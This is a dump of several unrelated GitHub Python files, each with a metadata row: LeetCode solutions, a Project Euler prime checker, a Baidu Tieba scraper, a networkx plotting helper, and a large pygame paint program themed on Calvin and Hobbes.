def search(term):
for k, v in notas.items():
if term in v:
return k
alunomaiornota = search(maiornota)
print("A maior nota foi a de {}, que tirou {} pontos." .format(alunomaiornota,maiornota))
| BrunoArivabene/NaviSummer2021 | Questao3.py | Questao3.py | py | 592 | python | pt | code | 0 | github-code | 36 |
28225180956 | from typing import List
import unittest
class Solution:
def carFleet(self, target: int, position: List[int], speed: List[int]) -> int:
records = [
(pos, spd) for pos, spd in zip(position, speed)
]
records.sort(key=lambda x: x[0])
for i in range(len(records)):
records[i] = (target - records[i][0])/records[i][1]
stack = []
for record in records:
while stack and record >= stack[-1]:
stack.pop()
stack.append(record)
return len(stack)
class TestCases(unittest.TestCase):
def setUp(self):
self.sol = Solution().carFleet
def test_solution_1(self):
target = 12
position = [10,8,0,5,3]
speed = [2,4,1,1,3]
ans = self.sol(target, position, speed)
expected = 3
self.assertEqual(ans, expected)
target = 100
position = [0,2,4]
speed = [4,2,1]
ans = self.sol(target, position, speed)
expected = 1
self.assertEqual(ans, expected)
target = 10
position = [3]
speed = [3]
ans = self.sol(target, position, speed)
expected = 1
self.assertEqual(ans, expected)
if __name__ == '__main__':
unittest.main() | HomayoonAlimohammadi/Training | Leetcode/853_CarFleet.py | 853_CarFleet.py | py | 1,349 | python | en | code | 2 | github-code | 36 |
75097166503 | #UPDATED PAINT/ORGANISED
#calvin and hobbes by Andy Liu
"""
FEATURES
buttons:
-red highlight on hover
-green highlight on click
tools:
-Pencil, only black and thin
-Line, drag and drop
-Oval, drag and drop, left click for filled,right click for unfilled
-Rectangle, see above
-Brush, variable color and size, smoothly connected
-Polygon, left click to add verticies, right click to close poly
-Spray can
-Dropper, click for the color
-Flood fill, fill an enclosed area with a color
-Hilighter, same as brush but translucent
-Eraser, erases to the choosed background
-Clear, Erase everything except choosed background
stamps:
-calvin
-moe
-hobbes
-wagon
-walking
-zombie
functions:
-undo
-redo
-(as png or jpg)
-load (png or jpg, loaded pic becomes choosed background)
music:
-play/pause music
-stop music (if you play again it restarts)
background:
-white
-rocks
-dinosaur
-tree
color choosing:
-wheel picker
-color display
text box:
-position relative to canvas
-color chosen
-button descriptors on hover
"""
"""
STATIC THINGS
only need to do once
"""
#SETUP
#=====================================================
#importing
from random import *
from math import *
from tkinter import *
from tkinter.filedialog import askopenfilename
from tkinter.filedialog import asksaveasfilename
from pygame import *
#tkinter stuff
root = Tk()
root.withdraw()
#screen
screen = display.set_mode((1280,800))
#background
background = image.load("images/calvin-background.jpg")
screen.blit(background,(0,0))
#canvas
canvas = Rect(50,50,720,540)
draw.rect(screen,(255,255,255),canvas)
draw.rect(screen,(0,0,0),(47,47,726,546),3) #outside border not inside
#title
titlepng = image.load("images/title.png")
screen.blit(titlepng, (885,14))
#font
font.init()
calibrifont = font.SysFont("Calibri",17)
#======================================================
#MUSIC LOAD AND VOLUME
#========================================================
init()
mixer.music.load("music/slipfunc - amid the flowers..mp3")
mixer.music.play(-1)
mixer.music.set_volume(0.25)
#=========================================================
#Text Box rectangle
#=========================================================
textbox = (790,430,265,160)
draw.rect(screen,(255,255,255),textbox)
draw.rect(screen,0,textbox,3)
#THE COLOR WHEEL
#========================================================
#wheel
wheel = image.load("images/colorwheel.png")
wheel = transform.smoothscale(wheel,(170,170))
wheelrect = (885,240,170,170)
screen.blit(wheel,(885,240))
draw.rect(screen,(255,255,255),wheelrect,3)
#color display
coldisplay = (1075,288,75,75)
colchoosed = ((1075,288),(1075,363),(1150,288)) #a triangle on the top left corner
draw.rect(screen,(255,255,255),coldisplay) #later will draw colchoosed with color picked
#=========================================================
#DRAWING BUTTONS AND PUTTING THEM IN LISTS
#most buttons are 75x75 with 20 px between
#========================================================
#tool buttons pattern for button places
toolbuts = []
p = 50
for i in range(6):
draw.rect(screen,(255,255,255),(p,610,75,75))
draw.rect(screen,(255,255,255),(p,705,75,75))
toolbuts.append((p,610,75,75))
toolbuts.append((p,705,75,75))
p+=95
#stamp buttons
stampbuts = []
q = 695 #similar code going down
for j in range(3):
draw.rect(screen,(255,255,255),(q,610,75,75))
draw.rect(screen,(255,255,255),(q,705,75,75))
stampbuts.append((q,610,75,75))
stampbuts.append((q,705,75,75))
q+=95
#function buttons
funtsbuts = []
r = 50
for c in range(4):
draw.rect(screen,(255,255,255),(790,r,75,75))
funtsbuts.append((790,r,75,75))
r += 95 #pattern goes down instead of across
#music buttons
#special places and sizes (50x50)
musicbuts = []
playbut = (984,631,50,50)
stopbut = (984,726,50,50)
musicbuts.extend((playbut,stopbut))
for place in musicbuts:
draw.rect(screen,(255,255,255),place)
#background changing buttons
backgroundbuts = []
whitebut = (1075,430,75,75)
draw.rect(screen,(255,255,255),whitebut)
hopsbut = (1170,430,75,75)
dinobut = (1075,515,75,75)
treebut = (1170,515,75,75)
backgroundbuts.extend((whitebut,hopsbut,dinobut,treebut))
#==========================================================
#IMAGE LOADING AND PUT INTO LISTS
#==========================================================
#tool images (logos)
toolimages = []
pencilpng = image.load("images/pencil-icon.png")
linepng = image.load("images/line-icon.png")
ovalpng = image.load("images/oval-icon.png")
rectanglepng = image.load("images/rectangle-icon.png")
brushpng = image.load("images/brush-icon.png")
polypng = image.load("images/poly-icon.png")
spraypng = image.load("images/spraycan-icon.png")
droppng = image.load("images/dropper-icon.png")
fillpng = image.load("images/fill-icon.png")
hilitepng = image.load("images/hilite-icon.png")
erasepng = image.load("images/eraser-icon.png")
erallpng = image.load("images/erall-icon.png")
toolimages.extend((pencilpng,linepng,ovalpng,rectanglepng,brushpng,polypng,spraypng,droppng,fillpng,hilitepng,erasepng,erallpng))
#stamp images
stampimages = []
calvinpng = image.load("images/calvin-stamp.png")
moepng = image.load("images/moe-stamp.png")
hobbespng = image.load("images/hobbes-stamp.png")
wagonpng = image.load("images/wagon-stamp.png")
walkingpng = image.load("images/walking-stamp.png")
zombiespng = image.load("images/zombies-stamp.png")
stampimages.extend((calvinpng,moepng,hobbespng,wagonpng,walkingpng,zombiespng))
#display stamp logos
#already cropped into squares
displayimages = []
calvindisp = image.load("images/calvin-display.png")
moedisp = image.load("images/moe-display.png")
hobbesdisp = image.load("images/hobbes-display.png")
wagondisp = image.load("images/wagon-display.png")
walkingdisp = image.load("images/walking-display.png")
zombiesdisp = image.load("images/zombies-display.png")
displayimages.extend((calvindisp,moedisp,hobbesdisp,wagondisp,walkingdisp,zombiesdisp))
#function images
funtimages = []
undopng = image.load("images/undo-icon.png")
redopng = image.load("images/redo-icon.png")
savepng = image.load("images/save-icon.png")
loadpng = image.load("images/import-icon.png")
funtimages.extend((undopng,redopng,savepng,loadpng))
#music images
musicimages = []
playpng = image.load("images/play-icon.png")
stoppng = image.load("images/stop-icon.png")
musicimages.extend((playpng,stoppng))
#background imagees
#these images are already resized to 720x540 externally
backimages = []
hopspng = image.load("images/hops-canvas.png")
dinopng = image.load("images/dino-canvas.png")
treepng = image.load("images/tree-canvas.png")
backimages.extend(("filler",hopspng,dinopng,treepng)) #filler in the white background spot, makes indexes consistent
#MAKE SURE TO CHACK FOR FILLER LATER
#background display images
#cropped to squares already
backdispimages = []
hopsdisp = image.load("images/hops-display.png")
dinodisp = image.load("images/dino-display.png")
treedisp = image.load("images/tree-display.png")
backdispimages.extend((hopsdisp,dinodisp,treedisp))
#===========================================================
#RESIZE ALL IMAGES
#faster with lists
#===========================================================
#resize background display images to 75x75
for img in backdispimages:
backdispimages[backdispimages.index(img)] = transform.smoothscale(img,(75,75))
backdispimages.insert(0,"filler spot") #fill the zero spot with a filler, make indexes consistent between all background related list AFTER resizing images
#resize tool images to 75x75
for img in toolimages:
toolimages[toolimages.index(img)] = transform.smoothscale(img,(75,75))
#resize display images to 75x75
for img in displayimages:
displayimages[displayimages.index(img)] = transform.smoothscale(img,(75,75))
#resize function images to 75x75
for img in funtimages:
funtimages[funtimages.index(img)] = transform.smoothscale(img,(75,75))
#resize music images to 50x50
for img in musicimages:
musicimages[musicimages.index(img)] = transform.smoothscale(img,(50,50))
#=============================================================
#BLIT IMAGES INTO CORRECT SPOTS
#=========================================================
#blit tool images
p = 50
for i in range(6): #same code as defining rectangles but now blitting images in their places instead
screen.blit(toolimages[2*i],(p,610)) #2 rows of buttons :. this pattern fills every box
screen.blit(toolimages[2*i+1],(p,705))
p+=95
#blit display images
q = 695
for i in range(3): #same code again
screen.blit(displayimages[2*i],(q,610))
screen.blit(displayimages[2*i+1],(q,705))
q+=95
#blit function images
r = 50
for i in range(4):
screen.blit(funtimages[i],(790,r))
r += 95
#blit music images
screen.blit(musicimages[0],(984,631))
screen.blit(musicimages[1],(984,726))
#blit background display
for i in [1,2,3]: #not index of zero cuz thats the filler button
(x,y,useless1,useless2) = backgroundbuts[i]
screen.blit(backdispimages[i],(x,y))
#===========================================================
#COLLECTION OF LISTS
#list of buttons, bools, text and names are all related by order
#in the true/false list whatever place is true is whatever thing is chosen
#using lists for all of this so the code for choosing tools can span loops and not alot of if/else
#===========================================================
#oneselect (tools + stamps) only one can be selected at once
oneselectbuts = toolbuts + stampbuts
oneselectbools = [True] + [False] * 17 #default pencil
oneselect = ["pencil","line","oval","rectangle","brush","poly","spray","drop",
"fill","hilite","erase","erall","calvin","moe","hobbes","wagon","walking","zombies"]
#functions
funts = ["undo","redo","save","load"]
funtsbools = [False]*4
#music
music = ["play","stop"]
musicbools = [True] + [False] #playing music is default
#background
backgroundbools = [True] + [False]*3
#everything
everybuts = oneselectbuts + funtsbuts + musicbuts + backgroundbuts
#text for dialog boxes
#lists inside lists let me blit each item in the inner list on different "lines" using a loop
#last one is blank for when nothing needs to be printed
tooltext = [
["Pencil","Draw a thin, black line"],
["Line","Draw a straight line"],
["Oval","Left click for filled","Right click for unfilled"],
["Rectangle","Left click for filled","Right click for unfilled"],
["Brush","Draw with a brush effect"],
["Polygon","Left click to connect points","Right click to close polygon"],
["Spray Can","Draw with a spray can effect"],
["Dropper","Click to select the color"],
["Fill","Fill the entire canvas"],
["Hilighter","Draw a translucent color"],
["Eraser","Erase where you click"],
["Clear","Erase everything"],
["Calvin Stamp"],
["Moe Stamp"],
["Hobbes Stamp"],
["Calvin and Hobbes on wagon Stamp"],
["Calvin and Hobbes walking Stamp"],
["Zombie Calvin and Hobbes Stamp"],
["Undo","Undo your last action"],
["Redo","Redo your last action"],
["Save","Save the canvas as a PNG or JPG"],
["Load","Load a canvas (720x540)"],
["Play","Click to pause/play music"],
["Stop","Stop the music"],
["White Background"],
["Hopping on rocks Background"],
["Dinosaur Background"],
["Sleeping in a tree Background"],
[" "]
]
#===========================================================
"""
ACTIVE PARTS
"""
#DEFAULT OPTIONS
#=========================================================
#undo/redo lists
undolist = []
redolist = []
canvascop = screen.subsurface(canvas).copy()
whitebox = canvascop #for background
undolist.append(canvascop)
#color (black)
r,g,b,a = 0,0,0,0 #makes it easier to alter A value
color = r,g,b,a #makes it easier to type
#poly points
points = []
#fill definitions
fillps = set()
fillcol = False #no color
size = 4
#undo/redo perameters
uponcanvas = False
clickoncanvas = False
choosedbackground = whitebox #the preselscted background, this defines the variable only at the start
#=======================================================
#START THE WHILE LOOP
#=======================================================
running = True
while running:
#flags for different events
click = False
unclick = False
left = False
right = False
upscroll = False
downscroll = False
for e in event.get():
#event triggers
if e.type == MOUSEBUTTONDOWN:
click = True
if e.button == 1:
left = True
if e.button == 3:
right = True
if e.button == 4:
upscroll = True
if e.button == 5:
downscroll = True
if e.type == MOUSEBUTTONUP:
if e.button == 1 or e.button == 3: #no mouse wheel plz
unclick = True
if e.type == QUIT:
running = False
#========================================================
#TYPICAL MOUSE FUNCTIONS
#========================================================
mx,my = mouse.get_pos()
mb = mouse.get_pressed()
#=========================================================
#SIZE
#=======================================================
#size selecting:
if upscroll and size<18: #sets max size
size += 1
if downscroll and size>4:#sets min size
size -= 1
#========================================================
#CHOOSE COLOR
#========================================================
#color picking:
if Rect(wheelrect).collidepoint((mx,my)) and (left or right):
r,g,b,a = screen.get_at((mx,my)) #using both rgba and color so setting A value is easier
color = r,g,b,a
#display color
draw.polygon(screen,color,colchoosed)
draw.rect(screen,color,coldisplay,3)
#=========================================================
#BUTTON HOVERING
#======================================================
#red if hovering else black. also keep track of the button hovering index for text box later
hovering = -1
for place in everybuts:
if Rect(place).collidepoint(mx,my):
draw.rect(screen,(255,0,0),place,3)
ind = everybuts.index(place)
hovering = ind
else:
draw.rect(screen,(0,0,0),place,3)
#=======================================================
#CLICKING BUTTONS
#THE ONLY WAY FOR A BUTTON TO TURN TRUE IS WITH A CLICK!
#====================================================
#oneselect
for but in oneselectbuts:
if Rect(but).collidepoint(mx,my) and (left or right):
ind = oneselectbuts.index(but)
oneselectbools = [False]*18
oneselectbools[ind] = True
#function
for but in funtsbuts:
if Rect(but).collidepoint(mx,my) and (left or right):
ind = funtsbuts.index(but)
funtsbools = [False]*4
funtsbools[ind] = True
#combining blitting the background on canvas and turning the button true
#the true is only for green highlight reasons now
#background
for but in backgroundbuts:
if Rect(but).collidepoint(mx,my):
if left or right:
ind = backgroundbuts.index(but)
if ind == 0:
draw.rect(screen,(255,255,255),canvas)
choosedbackground = whitebox #what the background is at the present moment. used later for erasing and erall purposes
else:
screen.blit(backimages[ind],(50,50))
choosedbackground = backimages[ind] #what the background is rn for future reference
undolist = []
undolist.append(choosedbackground) #reset undolist because selecting a different background is like clearing the screen
redolist = []
backgroundbools = [False]*4
backgroundbools[ind] = True
#music true and false work differently (both can be false at the same time)
#if play is true and you click than play is false
#no need for loop because its only 2 bools long
#cases for play
if Rect(musicbuts[0]).collidepoint(mx,my) and (left or right): #musicbools[0] is the play button
if musicbools[0]: # if play is true and you click on it, it turns false but stopbut doesn't turn true
musicbools[0] = False #:. pause NOT stop
else:
musicbools[0] = True
musicbools[1] = False
#case for stop
if Rect(musicbuts[1]).collidepoint(mx,my):
if right or left:
musicbools = [False]*2
musicbools[1] = True #always turns play to false when you click on stop
#====================================================================
#WHAT DID YOU CLICK?
#=============================================================================
#every "true" button gets a green border
#drawing green comes after drawing red so its always green
everybools = oneselectbools + funtsbools + musicbools + backgroundbools #every true and false at its current state
for but in everybuts:
if everybools[everybuts.index(but)]:
draw.rect(screen,(0,255,0),but,3)
#=======================================================
#Text in the text box
#=======================================================
#Reset text box
draw.rect(screen,(255,255,255),textbox)
draw.rect(screen,0,textbox,3)
#mouse location on canvas
mouselocation = calibrifont.render("Mouse position at "+str((mx-50,my-50)),True,(0,0,0)) #canvas starts at 50,50 so subtr 50 to get canvas position
notoncanvas = calibrifont.render("Not on canvas",True,(0,0,0))
if Rect(canvas).collidepoint(mx,my): #in case not on canvas
screen.blit(mouselocation,(800,447))
else:
screen.blit(notoncanvas,(800,447))
#color selected
colormessage = calibrifont.render("Color = "+str((r,g,b)),True,(0,0,0)) # A val is useless
screen.blit(colormessage,(800,470))
#size selected
sizemessage = calibrifont.render("Size = "+str(size),True,((0,0,0)))
screen.blit(sizemessage,(800,493))
#tool selected
d = 516
for text in tooltext[hovering]: #lists inside lists, puts every text short on a new "line"
toolmessage = calibrifont.render(text,True,(0,0,0)) #if hovering == -1 it blits the last text which is nothing
screen.blit(toolmessage, (800,d))
d += 23 #17 ft and 23 space gives 5 pixels of in between
#ACTUALLY DOING MUSIC NOW
#========================================================
#play and pause with music (false = pause) (true = play)
#playbut is play and pause in one place
if not musicbools[0]:
mixer.music.pause()
else:
if not mixer.music.get_busy():
mixer.music.play(-1)
else:
mixer.music.unpause()
#stop and unstop with music
if musicbools[1]:
mixer.music.stop()
#=======================================================
#SAVE AND LOAD
#=================================================
#save funtbools[2] is the save button
if funtsbools[2]:
location = asksaveasfilename()
if location != "": #prevents saving to nothing
image.save(screen.subsurface(canvas),location)
funtsbools[2] = False #do not repeat save
#load (funtcools[3] is the load button
if funtsbools[3]:
location = askopenfilename(filetypes = [("Picture files", "*.png;*.jpg")])
if location != "": #prevents loading from nothing
screen.set_clip(canvas)
loaded = image.load(location)
loaded = transform.smoothscale(loaded,(720,540))
choosedbackground = loaded
screen.blit(loaded,(50,50))
funtsbools[3] = False #do not repeat load
#===============================================
#UNDO AND REDO IS HARD (not anymroe)
#=======================================================
#UNDO
#is it drawing?
if (mb[0] == 1 or mb[2] == 1) and Rect(canvas).collidepoint(mx,my):
clickoncanvas = True
#add to undolist after mousebuttonup
if clickoncanvas:
if unclick:
uponcanvas = True
clickoncanvas = False
if len(undolist) == 1: #first unclick of the undolist resets the redolist so u cant redo past a blank screen
redolist = []
else:
uponcanvas = False
else:
uponcanvas = False
#adding things to the undolist
if uponcanvas:
onthecanvas = screen.subsurface(canvas).copy()
undolist.append(onthecanvas)
#the actual undoing
#blit the second last and move the last into redolist, check for length so no crashes
if funtsbools[0]:
if len(undolist)>1:
screen.blit(undolist[-2],(50,50))
redolist.append(undolist[-1])
del undolist[-1]
funtsbools[0] = False
#REDO
#blit the last and move it to undolist again
if funtsbools[1]:
if len(redolist)>0:
screen.blit(redolist[-1],(50,50))
undolist.append(redolist[-1])
del redolist[-1]
funtsbools[1] = False
#DRAWING STUFF!
#everything after this point has to do with drawing
#======================================================
screen.set_clip(canvas)
for trueorfalse in oneselectbools:
if trueorfalse: #if true :. it was clicked
if mb[0] == 1: #filled things and normal tools here
#pencil
if oneselect[oneselectbools.index(trueorfalse)] == "pencil": #only one bool in list is true :. index(trueorfalse) always has the right target, this is a way to jump from related lists
draw.line(screen,(0,0,0),(omx,omy),(mx,my),2) #always black, always size of 2., drawing a line from omx,omy to mx,my makes sure theres never any holes in the line
#line
if oneselect[oneselectbools.index(trueorfalse)] == "line":
if left: #set starting point
startingx,startingy = mx,my
cop = screen.copy()
hyp = int(hypot(mx-startingx,my-startingy))
screen.blit(cop,(0,0)) #so the line can "move" wothout drawing on the canvas until you unclick
for i in range(hyp): #draws a circle at every 1 interval of the hypotenuse
draw.circle(screen,color,(startingx+int((mx-startingx)/hyp*i),startingy+int((my-startingy)/hyp*i)),size) #similar triangles math all in one line
#filled oval
if oneselect[oneselectbools.index(trueorfalse)] == "oval": #see above
if left:
startingx,startingy =mx,my
cop = screen.copy()
screen.blit(cop,(0,0))
circrect = Rect(startingx,startingy,mx-startingx,my-startingy)
circrect.normalize()
draw.ellipse(screen,color,circrect)
#filled rectangle
if oneselect[oneselectbools.index(trueorfalse)] == "rectangle": #see above
if left:
startingx,startingy =mx,my
cop = screen.copy()
screen.blit(cop,(0,0))
draw.rect(screen,color,(startingx,startingy,mx-startingx,my-startingy))
#brush
if oneselect[oneselectbools.index(trueorfalse)] == "brush":
hyp = int(hypot(mx-omx,my-omy))
for i in range(hyp):
draw.circle(screen,color,(omx+int((mx-omx)/hyp*i),omy+int((my-omy)/hyp*i)),size) #see above (similar triangles)
#polygon is special, so it's skipped for now
#spraycan, 20 at a time is a good speed, pick random points
if oneselect[oneselectbools.index(trueorfalse)] == "spray":
for i in range(20):
rand1 = randint(size*-1,size)
rand2 = randint(size*-1,size)
if hypot(rand1,rand2) <= size:
screen.set_at((mx+rand1,my+rand2),color)
#dropper, selects the color you click
if oneselect[oneselectbools.index(trueorfalse)] == "drop":
if Rect(canvas).collidepoint(mx,my):
r,g,b,a = screen.get_at((mx,my)) #have to change both rgba and color to be consistent
color = r,g,b,a
#hiliter (translucent brush)
if oneselect[oneselectbools.index(trueorfalse)] == "hilite":
#what the hilite looks like
circscreen = Surface((size*2,size*2),SRCALPHA)
draw.circle(circscreen,(r,g,b,5),(size,size),size)
#put it on
hyp = int(hypot(mx-omx,my-omy))
for i in range(hyp):
screen.blit(circscreen,((omx+int((mx-omx)/hyp*i))-size,(omy+int((my-omy)/hyp*i))-size)) #the -size centers the surface(circle) to mouse
#eraser
if oneselect[oneselectbools.index(trueorfalse)] == "erase":
#the variable erasing is what you need to blit on screen, different cases for erasing depending on background
#define erasing when it is a white background
if choosedbackground == whitebox: #white square with dimensions 2sizex2size
erasing = Surface((size*2,size*2))
erasing.fill(16777215)
else:
picturesurface = Surface((1280,800)) #makes the subsurface thats the choosed background (same relativer mx and my)
picturesurface.blit(choosedbackground,(50,50))
hyp = int(hypot(mx-omx,my-omy))
for i in range(hyp):
#define erasing when not whitebackground
if choosedbackground != whitebox:
try:#try and except statements because this code sometimes crashes when you move the mouse too fast but if you skip the crashing case everything around it "fills its place" and it looks fine either way
erasing = picturesurface.subsurface(int(omx+int((mx-omx)/hyp*i))-size,int(omy+int((my-omy)/hyp*i))-size,size*2,size*2) #added int() so everything works
except:
pass
try:
screen.blit(erasing,((omx+int((mx-omx)/hyp*i))-size,(omy+int((my-omy)/hyp*i))-size))
except:
pass
#clear canvas, points list (poly), undolist (except for first) and redolist)
if oneselect[oneselectbools.index(trueorfalse)] == "erall":
if choosedbackground == whitebox:
draw.rect(screen,16777215,canvas)
else:
screen.blit(choosedbackground,(50,50))
points = []
undolist = [undolist[0]]
redolist = []
if mb[2] == 1:#unfilled shapes by rightclicking
#unfilled ellipse
#checked for ellipse radius greater than width
if oneselect[oneselectbools.index(trueorfalse)] == "oval": #same code as filled
if right:
startingx,startingy =mx,my
cop = screen.copy()
screen.blit(cop,(0,0))
circrect = Rect(startingx,startingy,mx-startingx,my-startingy)
circrect.normalize()
if circrect.h > 2*size and circrect.w > 2*size:
draw.arc(screen,color,circrect,0,360,size)
else:
draw.ellipse(screen,color,circrect)
#unfilled rectangle
if oneselect[oneselectbools.index(trueorfalse)] == "rectangle": #same code as filled rect
if right:
startingx,startingy = mx,my
cop = screen.copy()
screen.blit(cop,(0,0))
unfilled = Rect(startingx,startingy,mx-startingx,my-startingy)
evensize = size+size%2
draw.rect(screen,color,unfilled,evensize)
draw.rect(screen,color,(startingx-(evensize)//2+1,startingy-(evensize)//2+1,evensize,evensize)) #next 4 lines fill in the corners of the rectangle
draw.rect(screen,color,(startingx-(evensize)//2+1,my-(evensize)//2,evensize,evensize)) #the various +1's eliminate pygame inconsistencies
draw.rect(screen,color,(mx-(evensize)//2,startingy-(evensize)//2+1,evensize,evensize)) #(found by trial)
draw.rect(screen,color,(mx-(evensize)//2,my-(evensize)//2,evensize,evensize))
for trueorfalse in oneselectbools:
if trueorfalse:
#polygon is a special tool using both clicks :. in seperate loop
if oneselect[oneselectbools.index(trueorfalse)] == "poly":
if Rect(canvas).collidepoint(mx,my):
if left:
points.append((mx,my)) #put mouse pos in list when you left click
cop = screen.copy()
#size set on first click
if len(points) == 0:
setsize = size
#drawing "line" from the last clicked position to current mouse position
if len(points)>0:
lastx,lasty = points[-1]
hyp = int(hypot(mx-lastx,my-lasty))
screen.blit(cop,(0,0))
for i in range(hyp):
draw.circle(screen,color,(lastx+int((mx-lastx)/hyp*i),lasty+int((my-lasty)/hyp*i)),setsize)
#right click to close polygon between first and last points in pointlist
if right:
points.append((mx,my))
if len(points) > 0:
end1x,end1y = points[-1]
end2x,end2y = points[0]
hyp = int(hypot(end2x-end1x,end2y-end1y))
for i in range(hyp):
draw.circle(screen,color,(end1x+int((end2x-end1x)/hyp*i),end1y+int((end2y-end1y)/hyp*i)),setsize)
#resetting
points = []
for trueorfalse in oneselectbools: #more loop beginnings needed to take care of case where polygon is used and so nothing is true therefore fill
#cannot exist in loop because nothing is true
if trueorfalse:
#fill is a special tool using a points set
#change every adjacent color with the same color
#initial click point and color
if oneselect[oneselectbools.index(trueorfalse)] == "fill": #if tool is fill
#first click
if (left or right) and Rect(canvas).collidepoint(mx,my) and screen.get_at((mx,my)) != color:
fillps.add((mx,my))
fillcol = screen.get_at((mx,my))
screen.set_at((mx,my),color)
#while loop goes through every adjacent pixel from the click and spreads out, applicable pixels only need to be put in the set once
if fillcol != False:
while len(fillps)>0:
fx,fy = fillps.pop()
for adx in [-1,1]:
for ady in [-1,1]:
if screen.get_at((fx+adx,fy+ady)) == fillcol and ((fx+adx,fy+ady) not in fillps):
fillps.add((fx+adx,fy+ady))
screen.set_at((fx+adx,fy+ady),color)
#reset after loop
fillps = set()
#===============================================================
#STAMPS
#same code for every stamp
#==============================================================
#a bit of debugging
#if any function button is clicked while a stamp is selected it will blit it and do the function at the same time and cause problems
functionclick = False
for but in funtsbuts:
if Rect(but).collidepoint(mx,my):
functionclick = True
for trueorfalse in oneselectbools:
if trueorfalse:
if mb[0] == 1 and not functionclick:
#calvin stamp
if oneselect[oneselectbools.index(trueorfalse)] == "calvin":
length,width = calvinpng.get_rect().size #gets dimensions of image
if left:
cop = screen.copy()
screen.blit(cop,(0,0))
screen.blit(calvinpng,(mx-length//2,my-width//2)) #centers image to mouse
#moe stamp
if oneselect[oneselectbools.index(trueorfalse)] == "moe":
length,width = moepng.get_rect().size
if left:
cop = screen.copy()
screen.blit(cop,(0,0))
screen.blit(moepng,(mx-length//2,my-width//2))
#hobbes stamp
if oneselect[oneselectbools.index(trueorfalse)] == "hobbes":
length,width = hobbespng.get_rect().size
if left:
cop = screen.copy()
screen.blit(cop,(0,0))
screen.blit(hobbespng,(mx-length//2,my-width//2))
#wagon stamp
if oneselect[oneselectbools.index(trueorfalse)] == "wagon":
length,width = wagonpng.get_rect().size
if left:
cop = screen.copy()
screen.blit(cop,(0,0))
screen.blit(wagonpng,(mx-length//2,my-width//2))
#walking stamp
if oneselect[oneselectbools.index(trueorfalse)] == "walking":
length,width = walkingpng.get_rect().size
if left:
cop = screen.copy()
screen.blit(cop,(0,0))
screen.blit(walkingpng,(mx-length//2,my-width//2))
#zombies stamp
if oneselect[oneselectbools.index(trueorfalse)] == "zombies":
length,width = zombiespng.get_rect().size
if left:
cop = screen.copy()
screen.blit(cop,(0,0))
screen.blit(zombiespng,(mx-length//2,my-width//2))
screen.set_clip()
omx,omy = mx,my
#==============================================================
display.flip()
quit()
| andy-liuu/Paint-Project | updatedpaint.py | updatedpaint.py | py | 37,567 | python | en | code | 0 | github-code | 36 |
1165604872 | # https://leetcode.com/problems/subsets/
# Total subsets for an arr of len n is 2 power n
# Each subset is represented by binary representation of this total
# for ex. if n = 3
# total subsets is 8 viz. 2 power 3
# subset0 would be 000, subset1 = 001, subset2 = 010, subset3 = 011 and so on.
# if one is found in binary number then include num[index] where index is position of 1 in binary number
# for ex in 000 donot include any item in subset
# for 001 include only 3rd item (nums[2]) in subset
# for 010 include 2nd item (nums[1]) in subset
# 011 include 2nd and 3rd item (nums[1] and nums[2]) in subset
from typing import List
class Solution:
def _getbinary(self, num):
res: List[int] = []
while num > 0:
mod = num % 2
res.append(mod)
num = num // 2
return res
def subsets(self, nums: List[int]) -> List[List[int]]:
# init list
res: List = []
total= pow(2, len(nums))
for i in range(total):
bin_arr = self._getbinary(i)
index: int = 0
sub_set: List[int] = []
while(index < len(bin_arr)):
if (bin_arr[index] == 1):
sub_set.append(nums[index])
index += 1
res.append(sub_set)
return res
if __name__ == '__main__':
print(Solution().subsets([1, 2, 3]))
| acharyarajiv/leetcode | medium/subsets.py | subsets.py | py | 1,423 | python | en | code | 0 | github-code | 36 |
11695978241 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/3/27 16:43
# @Author : TanLHHH
# @Site :
# @File : tieba.py
# @Software: PyCharm
import requests,re
url = "https://tieba.baidu.com/f?kw=%E6%96%B0%E5%9E%8B%E5%86%A0%E7%8A%B6%E7%97%85%E6%AF%92&ie=utf-8&pn=0"
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36",
"Host": "tieba.baidu.com"
}
res = requests.get(url=url,headers=headers)
#print(res.content.decode('utf-8'))
pat = '<a rel="noreferrer" href="/p/(.*?)" title="(.*?)" target="_blank" class="j_th_tit ">'
title_list = re.compile(pat, re.S).findall(res.content.decode('utf-8'))
#url_pat = 'class="frs-author-name j_user_card " href="(.*?)" target="_blank">'
pat = 'title="主题作者:.*?".*? href="/home/main/(.*?)" target="'
url_list = re.compile(pat,re.S).findall(res.content.decode('utf-8'))
print(res.content.decode('utf-8'))
# print(res.status_code)
# print(title_list)
# print(title_list[0][0],title_list[0][1])
print(url_list)
print(len(url_list)) | TanLHHHH/Spiders | 测试文件夹/tieba.py | tieba.py | py | 1,112 | python | en | code | 3 | github-code | 36 |
14086957906 | import json
import networkx as nx
import matplotlib.pyplot as plt
def get_topology(edges):
g = nx.Graph()
l3edges_json = json.loads(edges.to_json(orient="index"))
for k in l3edges_json:
neighbor = l3edges_json[k]
node_id = neighbor["Interface"]["hostname"]
remote_node_id = neighbor["Remote_Interface"]["hostname"]
g.add_edge(node_id, remote_node_id)
return g
def get_figure(pframe):
"""
Plots Pandas data frame
"""
g = get_topology(pframe)
# Calculate spring layout
pos = nx.spring_layout(g)
# Draw the graph using matplotlib within Streamlit
fig, ax = plt.subplots()
nx.draw(g, pos, with_labels=True, ax=ax, node_size=1000, font_color="white")
return fig
| martimy/Bat-Q | pages/common/plotting.py | plotting.py | py | 756 | python | en | code | 1 | github-code | 36 |
9659540801 | # -*- coding: utf-8 -*-
"""
Created on Tue Jul 23 14:40:11 2019
@author: hoangt1
"""
#ANSWER: 748317
#NOTE: 1 is not prime
def reversed_num(n):
reversed_n=0
while(n>0):
remainder=n%10
reversed_n=reversed_n*10+remainder
n=n//10
return reversed_n
def is_prime(n):
if n==1: return 0
for i in range(2,int(n**0.5)+1):
if n%i==0: return 0
return 1
def is_truncatable_prime(n):
if not is_prime(n): return 0
# right -> left truncation
n1=n
n2=n
while n1>10:
r2l_trunc=n1//10
if not is_prime(r2l_trunc):
return 0
n1=r2l_trunc
# left -> right truncation
while n2>10:
rev_n=reversed_num(n2)
l2r_truc=reversed_num(rev_n//10)
if not is_prime(l2r_truc):
return 0
n2=l2r_truc
return 1
def calculation():
n=11
counter=0
s=0
while(counter<11):
n+=2 #Only odd numbers will be checked
if is_truncatable_prime(n):
print(n)
counter+=1
s+=n
print(s)
calculation()
